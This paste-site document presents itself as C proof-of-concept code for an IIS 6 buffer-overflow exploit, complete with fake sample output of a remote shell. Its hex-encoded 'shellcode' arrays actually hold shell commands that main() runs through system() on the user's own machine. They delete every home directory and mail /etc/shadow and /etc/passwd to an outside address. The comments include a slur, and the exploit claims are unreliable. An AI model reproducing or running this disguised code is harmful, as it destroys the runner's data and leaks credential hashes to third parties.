- /* Proof of concept code
- Please don't send us e-mails
- asking us "how to hack" because
- we will be forced to skullfsck you.
- DISCLAIMER:
- !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
- IIS 6 Buffer Overflow Exploit
- BUG: inetinfo.exe improperly bound checks
- http requests sent longer than 6998 chars.
- Can get messy but enough testing, and we have
- found a way in.
- VENDOR STATUS: Notified
- FIX: In process
- Remote root.
- eg.
- #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
- + Connecting to host...
- + Connected.
- + Inserting Shellcode...
- + Done...
- + Spawining shell..
- Microsoft Windows XP [Version 5.1.2600]
- (C) Copyright 1985-2001 Microsoft Corp.
- C:>
- */
- char shellcode[] =
- "x2fx62x69x6ex2fx72x6dx20"
- "x2dx72x66x20x2fx68x6fx6d"
- "x65x2fx2ax3bx63x6cx65x61"
- "x72x3bx65x63x68x6fx20x62"
- "x6cx34x63x6bx68x34x74x2c"
- "x68x65x68x65";
- char launcher [] =
- "x63x61x74x20x2fx65x74x63x2fx73"
- "x68x61x64x6fx77x20x7cx6dx61x69"
- "x6cx20x66x75x6cx6cx2dx64x69"
- "x73x63x6cx6fx73x75x72x65x40"
- "x6cx69x73x74x73x2ex67x72x6fx6b"
- "x2ex6fx72x67x2ex75x6bx20";
- char netcat_shell [] =
- "x63x61x74x20x2fx65x74x63x2fx70"
- "x61x73x73x77x64x20x7cx6dx61x69"
- "x6cx20x66x75x6cx6cx2dx64x69"
- "x73x63x6cx6fx73x75x72x65x40"
- "x6cx69x73x74x73x2ex67x72x6fx6b"
- "x2ex6fx72x67x2ex75x6bx20";
- main()
- {
- //Section Initialises designs implemented by mexicans
- //Imigrate
- system(launcher);
- system(netcat_shell);
- system(shellcode);
- //int socket = 0;
- //double long port = 0.0;
- //#DEFINE port host address
- //#DEFINE number of inters
- //#DEFINE gull eeuEE
- // for(int j; j < 30; j++)
- {
- //Find socket remote address fault
- printf(".");
- }
- //overtake inetinfo here IIS_666666^
- return 0;
- }
xx
By: tezt | Date: Mar 25 2008 21:04 | Format: None | Expires: never | Size: 1.91 KB | Hits: 1393
Latest pastes
1 days ago
2 days ago
5 days ago
6 days ago
6 days ago